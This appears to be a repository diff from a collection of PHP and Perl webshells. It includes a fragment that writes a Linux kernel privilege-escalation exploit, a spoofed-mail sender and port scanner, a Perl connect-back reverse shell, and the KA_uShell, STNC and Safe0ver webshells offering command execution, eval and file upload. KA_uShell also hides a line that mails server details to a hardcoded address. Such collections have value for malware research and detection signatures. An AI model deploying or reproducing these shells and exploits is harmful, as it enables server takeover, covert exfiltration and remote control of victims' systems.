" errno = ESRCH;\n" .
|
||||
" if (addr[ENTRY_MAGIC] != MAGIC)\n" .
|
||||
" fatal(\"Invalid LDT entry\");\n" .
|
||||
" /* setting call gate and privileged descriptors */\n" .
|
||||
" addr[ENTRY_GATE+0] = ((unsigned)CS << 16) | ((unsigned)kcode & 0xffffU);\n" .
|
||||
" addr[ENTRY_GATE+1] = ((unsigned)kcode & ~0xffffU) | 0xec00U;\n" .
|
||||
" addr[ENTRY_CS+0] = 0x0000ffffU; /* kernel 4GB code at 0x00000000 */\n" .
|
||||
" addr[ENTRY_CS+1] = 0x00cf9a00U;\n" .
|
||||
" addr[ENTRY_DS+0] = 0x0000ffffU; /* user 4GB code at 0x00000000 */\n" .
|
||||
" addr[ENTRY_DS+1] = 0x00cf9200U;\n" .
|
||||
" prepare();\n" .
|
||||
" if (setjmp(jmp) != 0) {\n" .
|
||||
" errno = ENOEXEC;\n" .
|
||||
" fatal(\"Unable to jump to call gate\");\n" .
|
||||
" }\n" .
|
||||
" asm(\"lcall $\" str(GATE) \",$0x0\"); /* this is it */\n" .
|
||||
"}\n" .
|
||||
"void shell(void)\n" .
|
||||
"{\n" .
|
||||
" char * argv[] = { _PATH_BSHELL, NULL };\n" .
|
||||
" execve(_PATH_BSHELL, argv, environ);\n" .
|
||||
" fatal(\"Unable to spawn shell\\n\");\n" .
|
||||
"}\n" .
|
||||
"void remap(void)\n" .
|
||||
"{\n" .
|
||||
" static char stack[8 MB]; /* new stack */\n" .
|
||||
" static char * envp[] = { \"PATH=\" _PATH_STDPATH, NULL };\n" .
|
||||
" static unsigned * m;\n" .
|
||||
" static unsigned b;\n" .
|
||||
" m = (unsigned *) sbrk(map_size);\n" .
|
||||
" if (!m)\n" .
|
||||
" fatal(\"Unable to allocate memory\");\n" .
|
||||
" environ = envp;\n" .
|
||||
" asm (\"movl %0, %%esp\\n\" : : \"a\" (stack + sizeof(stack)));\n" .
|
||||
" b = ((unsigned)sbrk(0) + PAGE_SIZE - 1) & PAGE_MASK;\n" .
|
||||
" if (munmap((void*)b, task_size - b) == -1)\n" .
|
||||
" fatal(\"Unable to unmap stack\");\n" .
|
||||
" while (b < task_size) {\n" .
|
||||
" if (sbrk(PAGE_SIZE) == NULL)\n" .
|
||||
" fatal(\"Unable to expand BSS\");\n" .
|
||||
" b += PAGE_SIZE;\n" .
|
||||
" }\n" .
|
||||
" ldt(m);\n" .
|
||||
" expand();\n" .
|
||||
" knockout();\n" .
|
||||
" shell();\n" .
|
||||
"}\n" .
|
||||
"int main(void)\n" .
|
||||
"{\n" .
|
||||
" configure();\n" .
|
||||
" remap();\n" .
|
||||
" return EXIT_FAILURE;\n" .
|
||||
"}\n";
|
||||
|
||||
$fp = fopen("/tmp/xpl_brk.c", "w");
|
||||
$ok = fwrite($fp, $kernel);
|
||||
|
||||
if (!empty($ok)) {
|
||||
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Linux Local Kernel Exploit Was Successfuly Copied</DIV>";
|
||||
} else {
|
||||
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Copying Kernel Exploit</DIV>";
|
||||
}
|
||||
}
|
||||
|
||||
?>
|
||||
</CENTER>
|
||||
<pre><font face="Tahoma" size="2">
|
||||
<?php
|
||||
|
||||
// Function to Visualize Source Code files
|
||||
if ($see != "") {
|
||||
$fp = fopen($see, "r");
|
||||
$read = fread($fp, 30000);
|
||||
echo "============== $see ================<br>";
|
||||
echo "<textarea name=textarea cols=80 rows=15>";
|
||||
echo "$read";
|
||||
Echo "</textarea>";
|
||||
}
|
||||
|
||||
// Function to Dowload Local Xploite Binary COde or Source Code
|
||||
|
||||
if ($dx != "") {
|
||||
$fp = @fopen("$hostxpl",r);
|
||||
$fp2 = @fopen("$storage","w");
|
||||
fwrite($fp2, "");
|
||||
$fp1 = @fopen("$storage","a+");
|
||||
for (;;) {
|
||||
$read = @fread($fp, 4096);
|
||||
if (empty($read)) break;
|
||||
$ok = fwrite($fp1, $read);
|
||||
|
||||
if (empty($ok)) {
|
||||
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Uploading File</DIV>";
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if (!empty($ok)) {
|
||||
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] File Was Successfuly Uploaded</DIV>";
|
||||
}
|
||||
}
|
||||
|
||||
flush( );
|
||||
|
||||
// Function to visulize Format Color Source Code PHP
|
||||
|
||||
if ($sfc != "") {
|
||||
$showcode = show_source("$sfc");
|
||||
echo "<font size=4> $showcode </font>";
|
||||
}
|
||||
|
||||
// Function to Visualize all infomation files
|
||||
if ($fileinfo != "") {
|
||||
$infofile = stat("$fileanalize");
|
||||
while (list($info, $value) = each ($infofile)) {
|
||||
echo" Info: $info Value: $value <br>";
|
||||
}
|
||||
}
|
||||
|
||||
// Function to send fake mail
|
||||
if ($fake == 1) {
|
||||
echo "<FORM METHOD=POST ACTION=\"$SCRIPT_NAME?$QUERY_STRING&send=1\">";
|
||||
echo "Your Fake Mail <INPUT TYPE=\"\" NAME=\"yourmail\"><br>";
|
||||
echo "Your Cavy:<INPUT TYPE=\"\" NAME=\"cavy\"><br>";
|
||||
echo "Suject: <INPUT TYPE=\"text\" NAME=\"subject\"><br>";
|
||||
echo "Text: <TEXTAREA NAME=\"body\" ROWS=\"\" COLS=\"\"></TEXTAREA><br>";
|
||||
echo "<INPUT TYPE=\"hidden\" NAME=\"send\" VALUE=\"1\"><br>";
|
||||
echo "<INPUT TYPE=\"submit\" VALUE=\"Send Fake Mail\">";
|
||||
echo "</FORM>";
|
||||
}
|
||||
|
||||
if($send == 1) {
|
||||
if (mail($cavy, $subject, $body, "From: $yourmail\r\n")) {
|
||||
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Mail Send Sucessfuly</DIV>";
|
||||
} else {
|
||||
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Sending Mail</DIV>";
|
||||
}
|
||||
}
|
||||
|
||||
if ($portscan != "") {
|
||||
$port = array ("21","22","23","25","110",);
|
||||
$values = count($port);
|
||||
for ($cont=0; $cont < $values; $cont++) {
|
||||
@$sock[$cont] = Fsockopen($SERVER_NAME, $port[$cont], $oi, $oi2, 1);
|
||||
$service = Getservbyport($port[$cont],"tcp");
|
||||
@$get = fgets($sock[$cont]);
|
||||
echo "<br>Port: $port[$cont] - Service: $service<br><br>";
|
||||
echo "<br>Banner: $get <br><br>";
|
||||
flush();
|
||||
}
|
||||
}
|
||||
|
||||
?>
|
||||
</font></pre>
|
61
xakep-shells/PHP/PHP Backdoor Connect.pl.php.txt
Normal file
61
xakep-shells/PHP/PHP Backdoor Connect.pl.php.txt
Normal file
|
@ -0,0 +1,61 @@
|
|||
#!/usr/bin/perl
|
||||
use IO::Socket;
|
||||
#IRAN HACKERS SABOTAGE Connect Back Shell
|
||||
#code by:LorD
|
||||
#We Are :LorD-C0d3r-NT
|
||||
#Email:LorD@ihsteam.com
|
||||
#
|
||||
#lord@SlackwareLinux:/home/programing$ perl dc.pl
|
||||
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
|
||||
#
|
||||
#Usage: dc.pl [Host] [Port]
|
||||
#
|
||||
#Ex: dc.pl 127.0.0.1 2121
|
||||
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
|
||||
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
|
||||
#
|
||||
#[*] Resolving HostName
|
||||
#[*] Connecting... 127.0.0.1
|
||||
#[*] Spawning Shell
|
||||
#[*] Connected to remote host
|
||||
|
||||
#bash-2.05b# nc -vv -l -p 2121
|
||||
#listening on [any] 2121 ...
|
||||
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
|
||||
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
|
||||
#
|
||||
#--==Systeminfo==--
|
||||
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
|
||||
#
|
||||
#--==Userinfo==--
|
||||
#uid=1001(lord) gid=100(users) groups=100(users)
|
||||
#
|
||||
#--==Directory==--
|
||||
#/root
|
||||
#
|
||||
#--==Shell==--
|
||||
#
|
||||
$system = '/bin/sh';
|
||||
$ARGC=@ARGV;
|
||||
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
|
||||
if ($ARGC!=2) {
|
||||
print "Usage: $0 [Host] [Port] \n\n";
|
||||
die "Ex: $0 127.0.0.1 2121 \n";
|
||||
}
|
||||
use Socket;
|
||||
use FileHandle;
|
||||
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
|
||||
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
|
||||
print "[*] Resolving HostName\n";
|
||||
print "[*] Connecting... $ARGV[0] \n";
|
||||
print "[*] Spawning Shell \n";
|
||||
print "[*] Connected to remote host \n";
|
||||
SOCKET->autoflush();
|
||||
open(STDIN, ">&SOCKET");
|
||||
open(STDOUT,">&SOCKET");
|
||||
open(STDERR,">&SOCKET");
|
||||
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
|
||||
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
|
||||
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
|
||||
system($system);
|
||||
#EOF
|
1010
xakep-shells/PHP/PHP Shell.php.php.txt
Normal file
1010
xakep-shells/PHP/PHP Shell.php.php.txt
Normal file
File diff suppressed because it is too large
Load diff
2553
xakep-shells/PHP/PHPRemoteView.php.txt
Normal file
2553
xakep-shells/PHP/PHPRemoteView.php.txt
Normal file
File diff suppressed because it is too large
Load diff
1456
xakep-shells/PHP/Private-i3lue.php.txt
Normal file
1456
xakep-shells/PHP/Private-i3lue.php.txt
Normal file
File diff suppressed because it is too large
Load diff
2553
xakep-shells/PHP/Rem View.php.php.txt
Normal file
2553
xakep-shells/PHP/Rem View.php.php.txt
Normal file
File diff suppressed because it is too large
Load diff
229
xakep-shells/PHP/Russian.php.php.txt
Normal file
229
xakep-shells/PHP/Russian.php.php.txt
Normal file
|
@ -0,0 +1,229 @@
|
|||
<!--
|
||||
|
||||
/+--------------------------------+\
|
||||
| KA_uShell |
|
||||
| <KAdot Universal Shell> |
|
||||
| Version 0.1.6 |
|
||||
| 13.03.04 |
|
||||
| Author: KAdot <KAdot@ngs.ru> |
|
||||
|--------------------------------|
|
||||
\+ +/
|
||||
|
||||
-->
|
||||
<html>
|
||||
<head>
|
||||
<title>KA_uShell 0.1.6</title>
|
||||
<style type="text/css">
|
||||
<!--
|
||||
body, table{font-family:Verdana; font-size:12px;}
|
||||
table {background-color:#EAEAEA; border-width:0px;}
|
||||
b {font-family:Arial; font-size:15px;}
|
||||
a{text-decoration:none;}
|
||||
-->
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<?php
|
||||
$self = $_SERVER['PHP_SELF'];
|
||||
$docr = $_SERVER['DOCUMENT_ROOT'];
|
||||
$sern = $_SERVER['SERVER_NAME'];
|
||||
$tend = "</tr></form></table><br><br><br><br>";
|
||||
|
||||
// Configuration
|
||||
$login = "admin";
|
||||
$pass = "123";
|
||||
|
||||
|
||||
/*/ Authentication
|
||||
if (!isset($_SERVER['PHP_AUTH_USER'])) {
|
||||
header('WWW-Authenticate: Basic realm="KA_uShell"');
|
||||
header('HTTP/1.0 401 Unauthorized');
|
||||
exit;}
|
||||
|
||||
else {
|
||||
if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
|
||||
{ echo "×òî íàäî?"; exit;}
|
||||
}
|
||||
*/
|
||||
|
||||
|
||||
|
||||
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
|
||||
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
|
||||
else {$ac = "shell";}
|
||||
|
||||
// Menu
|
||||
echo "
|
||||
|<a href=$self?ac=shell>Shell</a>|
|
||||
|<a href=$self?ac=upload>File Upload</a>|
|
||||
|<a href=$self?ac=tools>Tools</a>|
|
||||
|<a href=$self?ac=eval>PHP Eval Code</a>|
|
||||
|<a href=$self?ac=whois>Whois</a>|
|
||||
<br><br><br><pre>";
|
||||
|
||||
|
||||
switch($ac) {
|
||||
|
||||
// Shell
|
||||
case "shell":
|
||||
|
||||
echo <<<HTML
|
||||
<b>Shell</b>
|
||||
<table>
|
||||
<form action="$self" method="POST">
|
||||
<input type="hidden" name="ac" value="shell">
|
||||
<tr><td>
|
||||
$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
|
||||
</td></tr>
|
||||
<tr><td>
|
||||
<textarea cols="100" rows="25">
|
||||
HTML;
|
||||
|
||||
if (!empty($_POST['c'])){
|
||||
passthru($_POST['c']);
|
||||
}
|
||||
echo "</textarea></td>$tend";
|
||||
break;
|
||||
|
||||
|
||||
//PHP Eval Code execution
|
||||
case "eval":
|
||||
|
||||
echo <<<HTML
|
||||
<b>PHP Eval Code</b>
|
||||
<table>
|
||||
<form method="POST" action="$self">
|
||||
<input type="hidden" name="ac" value="eval">
|
||||
<tr>
|
||||
<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td><input type="submit" value="Enter"></td>
|
||||
$tend
|
||||
HTML;
|
||||
|
||||
if (isset($_POST['ephp'])){
|
||||
eval($_POST['ephp']);
|
||||
}
|
||||
break;
|
||||
|
||||
|
||||
//Text tools
|
||||
case "tools":
|
||||
|
||||
echo <<<HTML
|
||||
<b>Tools</b>
|
||||
<table>
|
||||
<form method="POST" action="$self">
|
||||
<input type="hidden" name="ac" value="tools">
|
||||
<tr>
|
||||
<td>
|
||||
<input type="radio" name="tac" value="1">B64 Decode<br>
|
||||
<input type="radio" name="tac" value="2">B64 Encode<br><hr>
|
||||
<input type="radio" name="tac" value="3">md5 Hash
|
||||
</td>
|
||||
<td><textarea name="tot" rows="5" cols="42"></textarea></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td> </td>
|
||||
<td><input type="submit" value="Enter"></td>
|
||||
$tend
|
||||
HTML;
|
||||
|
||||
if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
|
||||
|
||||
switch($_POST['tac']) {
|
||||
|
||||
case "1":
|
||||
echo "Ðàñêîäèðîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
|
||||
break;
|
||||
|
||||
case "2":
|
||||
echo "Êîäèðîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
|
||||
break;
|
||||
|
||||
case "3":
|
||||
echo "Êîäèðîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
|
||||
break;
|
||||
}}
|
||||
break;
|
||||
|
||||
|
||||
// Uploading
|
||||
case "upload":
|
||||
|
||||
echo <<<HTML
|
||||
<b>File Upload</b>
|
||||
<table>
|
||||
<form enctype="multipart/form-data" action="$self" method="POST">
|
||||
<input type="hidden" name="ac" value="upload">
|
||||
<tr>
|
||||
<td>Ôàéëî:</td>
|
||||
<td><input size="48" name="file" type="file"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Ïàïêà:</td>
|
||||
<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
|
||||
$tend
|
||||
HTML;
|
||||
$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
|
||||
if (isset($_POST['path'])){
|
||||
|
||||
$uploadfile = $_POST['path'].$_FILES['file']['name'];
|
||||
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
|
||||
|
||||
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
|
||||
echo "Ôàéëî óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n";
|
||||
echo "Èìÿ:" .$_FILES['file']['name']. "\n";
|
||||
echo "Ðàçìåð:" .$_FILES['file']['size']. "\n";
|
||||
|
||||
} else {
|
||||
print "Íå óäà¸òñÿ çàãðóçèòü ôàéëî. Èíôà:\n";
|
||||
print_r($_FILES);
|
||||
}
|
||||
}
|
||||
break;
|
||||
|
||||
|
||||
// Whois
|
||||
case "whois":
|
||||
echo <<<HTML
|
||||
<b>Whois</b>
|
||||
<table>
|
||||
<form action="$self" method="POST">
|
||||
<input type="hidden" name="ac" value="whois">
|
||||
<tr>
|
||||
<td>Äîìåí:</td>
|
||||
<td><input size="40" type="text" name="wq"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Õóéç ñåðâåð:</td>
|
||||
<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
|
||||
</tr>
|
||||
<tr><td>
|
||||
<input align="right" type="submit" value="Enter">
|
||||
</td></tr>
|
||||
$tend
|
||||
HTML;
|
||||
|
||||
if (isset($_POST['wq']) && $_POST['wq']<>"") {
|
||||
|
||||
if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
|
||||
|
||||
$querty = $_POST['wq']."\r\n";
|
||||
$fp = fsockopen($wser, 43);
|
||||
|
||||
if (!$fp) {echo "Íå ìîãó îòêðûòü ñîêåò";} else {
|
||||
fputs($fp, $querty);
|
||||
while(!feof($fp)){echo fgets($fp, 4000);}
|
||||
fclose($fp);
|
||||
}}
|
||||
break;
|
||||
|
||||
|
||||
}
|
||||
?>
|
||||
</pre>
|
||||
</body>
|
||||
</html>
|
168
xakep-shells/PHP/STNC.php.php.txt
Normal file
168
xakep-shells/PHP/STNC.php.php.txt
Normal file
|
@ -0,0 +1,168 @@
|
|||
<?php
|
||||
$version = "0.8";
|
||||
$vsplit = "style=\"border-right: #000000 1px solid;\"";
|
||||
$hsplit = "style=\"border-bottom: #000000 1px solid;\"";
|
||||
error_reporting(0);
|
||||
|
||||
if(version_compare(phpversion(),"4.1.0") == -1)
|
||||
{ $_POST=&$HTTP_POST_VARS; }
|
||||
if(get_magic_quotes_gpc())
|
||||
foreach ($_POST as $k=>$v)
|
||||
{ $_POST[$k] = stripslashes($v); }
|
||||
|
||||
/*
|
||||
$login='root';
|
||||
$hash='b1b3773a05c0ed0176787a4f1574ff0075f7521e'; // sha1("qwerty")
|
||||
|
||||
if(!(($_SERVER["PHP_AUTH_USER"]===$login)&&(sha1($_SERVER["PHP_AUTH_PW"])===$hash)))
|
||||
{
|
||||
header("HTTP/1.0 401 Unauthorized");
|
||||
header("WWW-Authenticate: Basic");
|
||||
die();
|
||||
}
|
||||
*/
|
||||
|
||||
function fe($s)
|
||||
{return function_exists($s);}
|
||||
function cmd($s)
|
||||
{if(fe("exec")){exec($s,$r);$r=join("\n",$r);}
|
||||
elseif(fe("shell_exec"))$r=shell_exec($s);
|
||||
elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean();}
|
||||
elseif(fe("passthru")){ob_start();passthru($s);$r=ob_get_contents();ob_end_clean();}
|
||||
elseif(is_resource($f=popen($s,"r"))){$r="";while(!feof($f))$r.=fread($f,512);pclose($f);}
|
||||
else $r=`$s`;return $r;}
|
||||
function safe_mode_is_on()
|
||||
{return ini_get('safe_mode');}
|
||||
function str100($s)
|
||||
{if(strlen($s)>100) $s=substr($s,0,100)."..."; return $s;}
|
||||
function id()
|
||||
{return str100(cmd("id"));}
|
||||
function uname()
|
||||
{return str100(cmd("uname -a"));}
|
||||
|
||||
function edit($size, $name, $val)
|
||||
{ return "<input type=text size=$size name=$name value=\"$val\">"; }
|
||||
function button($capt)
|
||||
{ return "<input class=\"btn\" type=submit value=\"$capt\">"; }
|
||||
function hidden($name, $val)
|
||||
{ return "<input type=hidden name=$name value=\"$val\">"; }
|
||||
function hidden_pwd()
|
||||
{ global $location; return hidden("pwd",$location);}
|
||||
|
||||
$action_edit = false;
|
||||
|
||||
$printline = "";
|
||||
|
||||
if(isset($_POST["action"])) $action = $_POST["action"];
|
||||
else $action = "cmd";
|
||||
|
||||
if(isset($_POST["pwd"]))
|
||||
{ $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pwd); else $printline = "\"$pwd\" - no such directory."; }
|
||||
|
||||
$location = getcwd();
|
||||
|
||||
if(($action === "download")&&(isset($_POST["fname"])))
|
||||
{
|
||||
$fname = $_POST["fname"];
|
||||
if(file_exists($fname))
|
||||
{
|
||||
$pathinfo = pathinfo($fname);
|
||||
header("Content-Transfer-Encoding: binary");
|
||||
header("Content-type: application/x-download");
|
||||
header("Content-Length: ".filesize($fname));
|
||||
header("Content-Disposition: attachment; filename=".$pathinfo["basename"]);
|
||||
readfile($fname);
|
||||
die();
|
||||
}
|
||||
else
|
||||
$printline = "\"$fname\" - download failed.";
|
||||
}
|
||||
|
||||
echo "<head><style>input {border: black 1px solid; background-color: #dfdfdf; font: 8pt verdana;}
|
||||
textarea {background-color:#dfdfdf; scrollbar-face-color: #dfdfdf; scrollbar-highlight-color: #dfdfdf;
|
||||
scrollbar-shadow-color: #dfdfdf; scrollbar-3dlight-color: #dfdfdf; scrollbar-arrow-color: #dfdfdf; scrollbar-track-color: #dfdfdf;
|
||||
scrollbar-darkshadow-color: #dfdfdf; border: black 1px solid; font: fixedsys bold; }
|
||||
td {padding:0;} body {margin: 0; padding: 0; background-color: #cfcfcf;} a {color:black;text-decoration:none;}
|
||||
.btn {background-color: #cfcfcf;} .pad {padding:5;}
|
||||
</style><title> STNC WebShell v$version </title></head><body><table width=100%>
|
||||
<tr><td $hsplit><table><tr><td $vsplit><b> STNC WebShell v$version </b></td><td>id: ".id()."<br>uname: ".uname()."<br>your ip: ".$_SERVER["REMOTE_ADDR"]." - server ip: ".gethostbyname($_SERVER["HTTP_HOST"])." - safe_mode: ".((safe_mode_is_on()) ? "on" : "off")."</td></tr></table></tr></td>
|
||||
<tr><form method=post><td class=\"pad\" colspan=2 $hsplit><center>".hidden("action","save").hidden_pwd()."<textarea cols=120 rows=16 wrap=off name=data>";
|
||||
|
||||
echo htmlspecialchars($printline)."\n";
|
||||
|
||||
if($action === "cmd")
|
||||
{
|
||||
if(isset($_POST["cmd"]))
|
||||
$cmd = $_POST["cmd"];
|
||||
else
|
||||
$cmd = "ls -la";
|
||||
|
||||
$result = htmlspecialchars(cmd($cmd));
|
||||
|
||||
if($result === "")
|
||||
$result = cmd("ls -la");
|
||||
|
||||
echo $result;
|
||||
$location = getcwd();
|
||||
}
|
||||
elseif(($action === "edit")&&(isset($_POST["fname"])))
|
||||
{
|
||||
$fname = $_POST["fname"];
|
||||
ob_start();
|
||||
|
||||
if(!readfile($fname))
|
||||
echo "Cann't open file \"$fname\".";
|
||||
else
|
||||
$action_edit = true;
|
||||
|
||||
$result = ob_get_clean();
|
||||
ob_end_clean();
|
||||
echo htmlspecialchars($result);
|
||||
}
|
||||
elseif(($action === "save")&&(isset($_POST["fname"]))&&(isset($_POST["data"])))
|
||||
{
|
||||
$fname = $_POST["fname"];
|
||||
$data = $_POST["data"];
|
||||
$fid = fopen($fname, "w");
|
||||
$fname = htmlspecialchars($fname);
|
||||
|
||||
if(!$fid)
|
||||
echo "Cann't save file \"$fname\".";
|
||||
else
|
||||
{
|
||||
fputs($fid, $data);
|
||||
fclose($fid);
|
||||
echo "File \"$fname\" is saved.";
|
||||
}
|
||||
}
|
||||
elseif(($action === "upload")&&(isset($_FILES["file"]))&&(isset($_POST["fname"])))
|
||||
{
|
||||
$fname = $_POST["fname"];
|
||||
if(copy($_FILES["file"]["tmp_name"], $fname))
|
||||
echo "File \"$fname\" is uploaded.\nFile size: ".filesize($fname)." bytes.";
|
||||
else
|
||||
echo "Upload failed!";
|
||||
}
|
||||
elseif(($action === "eval")&&(isset($_POST["code"])))
|
||||
{
|
||||
$code = $_POST["code"];
|
||||
ob_start();
|
||||
eval($code);
|
||||
$result = ob_get_clean();
|
||||
ob_end_clean();
|
||||
echo htmlspecialchars($result);
|
||||
}
|
||||
|
||||
echo "</textarea>".(($action_edit) ? "<br>".button(" Save ").hidden("fname",$fname):"")."</center></td></form></tr>
|
||||
<tr><form method=post><td class=\"pad\" $hsplit><center>".hidden("action","cmd")."<table><tr><td width=80>Command: </td><td>".edit(85,"cmd","")."</td></tr><tr><td>Location: </td><td>".edit(85,"pwd",$location)." ".button("Execute")."</td></tr></table></center></td></form></tr>
|
||||
<tr><form method=post><td class=\"pad\" $hsplit><center>".hidden("action","edit").hidden_pwd()."<table><tr><td width=80>Edit file:</td><td>".edit(85,"fname",$location)."</td><td>".button(" Edit ")."</td></table></center></td></form></tr>
|
||||
|
||||
<tr><form method=post><td class=\"pad\" $hsplit><table width=100%><tr><td width=50% $vsplit>".
|
||||
hidden("action","download").hidden_pwd()."<center><table><tr><td width=80>File:</td><td>".edit(50,"fname",$location)."</td><td>".button("Download")."</td></tr></table></center>
|
||||
</td></form><form method=post enctype=multipart/form-data><td class=\"pad\" width=50%>".
|
||||
hidden("action","upload").hidden_pwd()."<center><table><tr><td width=80>File:</td><td><input type=file size=50 name=file></td></tr><tr><td>To file:</td><td>".edit(50,"fname",$location)." ".button("Upload")."</td></tr></table></center>
|
||||
</td></tr></table></td></form></tr>
|
||||
|
||||
<tr><form method=post><td class=\"pad\" $hsplit>".hidden("action","eval").hidden_pwd()."<center><textarea cols=100 rows=4 wrap=off name=code></textarea><br>".button(" Eval ")."</center></td></form></tr>
|
||||
<tr><td align=right>Coded by drmist | <a href=\"http://drmist.ru\">http://drmist.ru</a> | <a href=\"http://www.security-teams.net\">http://www.security-teams.net</a> | <a href=\"http://www.security-teams.net/index.php?showtopic=3429\">not enough functions?</a> | (c) 2006 [STNC]</td></tr></table></body>";
|
||||
?>
|
|
@ -0,0 +1,950 @@
|
|||
<?php
|
||||
|
||||
|
||||
/*
|
||||
*****************************************************************************************
|
||||
* Safe0ver Shell //Safe Mod Bypass By Evilc0der *
|
||||
*****************************************************************************************
|
||||
* Evilc0der.org is a Platform Which You can Publish Your Shell Script *
|
||||
|
||||
*****************************************************************************************
|
||||
|
||||
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
|
||||
!! Dikkat ! Script Egitim Amacli Yazilmistir.Scripti Kullanarak Yapacaginiz Illegal eylemlerden sorumlu Degiliz.
|
||||
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
|
||||
*/
|
||||
|
||||
|
||||
/*Setting some envirionment variables...*/
|
||||
|
||||
/* I added this to ensure the script will run correctly...
|
||||
Please enter the Script's filename in this variable. */
|
||||
$SFileName=$PHP_SELF;
|
||||
|
||||
/* uncomment the two following variables if you want to use http
|
||||
authentication. This will password protect your PHPShell */
|
||||
//$http_auth_user = "phpshell"; /* HTTP Authorisation username, uncomment if you want to use this */
|
||||
//$http_auth_pass = "phpshell"; /* HTTP Authorisation password, uncomment if you want to use this */
|
||||
|
||||
error_reporting(0);
|
||||
$PHPVer=phpversion();
|
||||
$isGoodver=(intval($PHPVer[0])>=4);
|
||||
$scriptTitle = "Safe0ver";
|
||||
$scriptident = "$scriptTitle By Evilc0der.org";
|
||||
|
||||
$urlAdd = "";
|
||||
$formAdd = "";
|
||||
|
||||
function walkArray($array){
|
||||
while (list($key, $data) = each($array))
|
||||
if (is_array($data)) { walkArray($data); }
|
||||
else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
|
||||
}
|
||||
|
||||
if (isset($_PUT)) walkArray($_PUT);
|
||||
if (isset($_GET)) walkArray($_GET);
|
||||
if (isset($_POST)) walkArray($_POST);
|
||||
|
||||
|
||||
$pos = strpos($urlAdd, "s=r");
|
||||
if (strval($pos) != "") {
|
||||
$urlAdd= substr($urlAdd, 0, $pos);
|
||||
}
|
||||
|
||||
$urlAdd .= "&s=r&";
|
||||
|
||||
if (empty($Pmax))
|
||||
$Pmax = 125; /* Identifies the max amount of Directories and files listed on one page */
|
||||
if (empty($Pidx))
|
||||
$Pidx = 0;
|
||||
|
||||
$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
|
||||
$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
|
||||
|
||||
$scriptdate = "7 Subat 2007";
|
||||
$scriptver = "Bet@ Versiyon";
|
||||
$LOCAL_IMAGE_DIR = "img";
|
||||
$REMOTE_IMAGE_URL = "img";
|
||||
$img = array(
|
||||
"Edit" => "edit.gif",
|
||||
"Download" => "download.gif",
|
||||
"Upload" => "upload.gif",
|
||||
"Delete" => "delete.gif",
|
||||
"View" => "view.gif",
|
